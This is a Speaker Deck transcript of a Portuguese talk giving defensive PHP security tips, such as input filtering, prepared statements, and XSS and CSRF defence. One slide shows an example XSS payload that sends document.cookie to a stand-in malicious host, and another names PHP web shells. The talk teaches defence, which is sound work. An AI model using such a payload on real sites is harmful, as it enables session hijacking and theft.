Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Dicas de segurança para o PHP e seus amigos
Search
Sponsored
·
SiteGround - Reliable hosting with speed, security, and support you can count on.
→
Joubert RedRat
November 18, 2016
Technology
34
0
Share
Dicas de segurança para o PHP e seus amigos
Joubert RedRat
November 18, 2016
More Decks by Joubert RedRat
See All by Joubert RedRat
Programação defensiva com PHP
joubertredrat
0
29
Testes de integração com Testcontainers
joubertredrat
0
39
Retome o controle do seu analytics com Matomo
joubertredrat
0
39
#tbt do PHP, a evolução da linguagem nos últimos 30 anos
joubertredrat
0
39
DevBox, o meu pequeno projeto open source para o dia a dia do dev
joubertredrat
0
40
O poder do Object Calisthenics no PHP
joubertredrat
0
150
Playing with Docker and Docker Compose
joubertredrat
0
150
Why migrate your application to microservices?
joubertredrat
0
32
Por que migrar sua aplicação para Microserviços?
joubertredrat
0
34
Other Decks in Technology
See All in Technology
機能・非機能の学びを一つに!Agent Skillsで月間レポート作成始めてみた / Unifying Bug & Infra Insights — Building Monthly Quality Reports with Agent Skills
bun913
5
3.9k
AI時代に新卒採用、はじめました/junior-engineer-never-die
dmnlk
0
230
Claude Teamプランの選定と、できること/できないこと
rfdnxbro
1
1.9k
プロダクトを育てるように生成AIによる開発プロセスを育てよう
kakehashi
PRO
1
920
Zero Data Loss Autonomous Recovery Service サービス概要
oracle4engineer
PRO
4
14k
「決め方」の渡し方 / How to hand over the "decision-making process"
pauli
8
1.3k
3つのボトルネックを解消し、リリースエンジニアリングを再定義した話
nealle
0
350
シン・リスコフの置換原則 〜現代風に考えるSOLIDの原則〜
jinwatanabe
0
170
推し活エージェント
yuntan_t
1
900
建設的な現実逃避のしかた / How to practice constructive escapism
pauli
4
300
Strands Agents × Amazon Bedrock AgentCoreで パーソナルAIエージェントを作ろう
yokomachi
2
260
数案件を同時に進行するためのコンテキスト整理術
sutetotanuki
1
130
Featured
See All Featured
Learning to Love Humans: Emotional Interface Design
aarron
275
41k
Facilitating Awesome Meetings
lara
57
6.8k
Stewardship and Sustainability of Urban and Community Forests
pwiseman
0
170
RailsConf & Balkan Ruby 2019: The Past, Present, and Future of Rails at GitHub
eileencodes
141
35k
Unsuck your backbone
ammeep
672
58k
How to train your dragon (web standard)
notwaldorf
97
6.6k
[SF Ruby Conf 2025] Rails X
palkan
2
930
Future Trends and Review - Lecture 12 - Web Technologies (1019888BNR)
signer
PRO
0
3.4k
Darren the Foodie - Storyboard
khoart
PRO
3
3.2k
Skip the Path - Find Your Career Trail
mkilby
1
100
Paper Plane
katiecoart
PRO
1
49k
Six Lessons from altMBA
skipperchong
29
4.2k
Transcript
Dicas de segurança para o PHP e seus amigos BHACK
2016 – SEGURANÇA TI CONHECIMENTO
Eu? Sou este ai https://github.com/joubertredrat https://br.linkedin.com/in/joubertredrat https://twitter.com/joubertredrat http://www.vivaolinux.com.br/~joubertredrat * no
meu Linkedin explica o porque do apelido RedRat https://creativecommons.org/licenses/by-sa/4.0/ Dicas de segurança para o PHP e seus amigos
Dicas de segurança para o PHP e seus amigos INFORMAÇÃO
É PODER QUEM TEM INFORMAÇÃO DOMINA O MUNDO
Dicas de segurança para o PHP e seus amigos 1ª
DICA REMOVER INFORMAÇÕES DESNECESSÁRIAS
Dicas de segurança para o PHP e seus amigos 1ª
DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS
Dicas de segurança para o PHP e seus amigos 1ª
DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS
Dicas de segurança para o PHP e seus amigos 2ª
DICA ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS
Dicas de segurança para o PHP e seus amigos 2ª
DICA - ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS
Dicas de segurança para o PHP e seus amigos 3ª
DICA DESABILITAR OU EVITAR RECURSOS EXTERNOS
Dicas de segurança para o PHP e seus amigos 3ª
DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS R57 R6 C99Shell C100Shell bypass Tool25 b374k GaZa
Dicas de segurança para o PHP e seus amigos 3ª
DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS http://php.net/allow-url-include
Dicas de segurança para o PHP e seus amigos 4ª
DICA USAR URL AMIGÁVEIS E EVITAR QUERY STRING
Dicas de segurança para o PHP e seus amigos 4ª
DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING
Dicas de segurança para o PHP e seus amigos 5ª
DICA TRATAR OS DADOS VINDOS DO USUÁRIO MESMO ASSIM QUER USAR QUERY STRING? 4ª DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING
Dicas de segurança para o PHP e seus amigos 5ª
DICA - TRATAR OS DADOS VINDOS DO USUÁRIO filter_var mysqli_stmt_bind_param PDOStatement::bindValue DateTime::getLastErrors(); is_(bool,callable,numeric,float,string,object,etc) Libs no Packagist
Dicas de segurança para o PHP e seus amigos 5ª
DICA - TRATAR OS DADOS VINDOS DO USUÁRIO Quer fazer testes? sqlmap Zed Attack Proxy “ZAP” BeEF sqlninja
Dicas de segurança para o PHP e seus amigos 6ª
DICA EVITAR O USO DA PRIMARY KEY OU ID
Dicas de segurança para o PHP e seus amigos 6ª
DICA - EVITAR O USO DA PRIMARY KEY OU ID • UUID • GUID • MD5/CRC32/SHA1/SHA256 • Hash ou Ofuscamento
Dicas de segurança para o PHP e seus amigos 6ª
DICA - EVITAR O USO DA PRIMARY KEY OU ID
Dicas de segurança para o PHP e seus amigos 7ª
DICA (PRIMA DA 5ª DICA) CROSS-SITE SCRIPTING
Dicas de segurança para o PHP e seus amigos 7ª
DICA - CROSS-SITE SCRIPTING
Dicas de segurança para o PHP e seus amigos 7ª
DICA - CROSS-SITE SCRIPTING
Dicas de segurança para o PHP e seus amigos 7ª
DICA - CROSS-SITE SCRIPTING
Dicas de segurança para o PHP e seus amigos 7ª
DICA - CROSS-SITE SCRIPTING results.php?q=<script>window.open("http://site.do.mal/get.php?cookie=" + document.cookie, "_blank");</script>
Dicas de segurança para o PHP e seus amigos 8ª
DICA CROSS SITE REQUEST FORGERY
Dicas de segurança para o PHP e seus amigos 8ª
DICA - CROSS SITE REQUEST FORGERY
Dicas de segurança para o PHP e seus amigos 9ª
DICA USAR CHECKSUM OU O VCS AO SEU FAVOR
Dicas de segurança para o PHP e seus amigos 9ª
DICA - USAR CHECKSUM OU O VCS AO SEU FAVOR
Dicas de segurança para o PHP e seus amigos ACABOU
AS DICAS POR HOJE PERGUNTAS? FALA QUE NÃO TEM
SiteGround - Reliable hosting with speed, security, and support you can count on.
joubertredrat
bun913
dmnlk
rfdnxbro
kakehashi
oracle4engineer
pauli
nealle
jinwatanabe
yuntan_t
yokomachi
sutetotanuki
aarron
lara
pwiseman
eileencodes
ammeep
notwaldorf
palkan
signer
khoart
mkilby
katiecoart
skipperchong
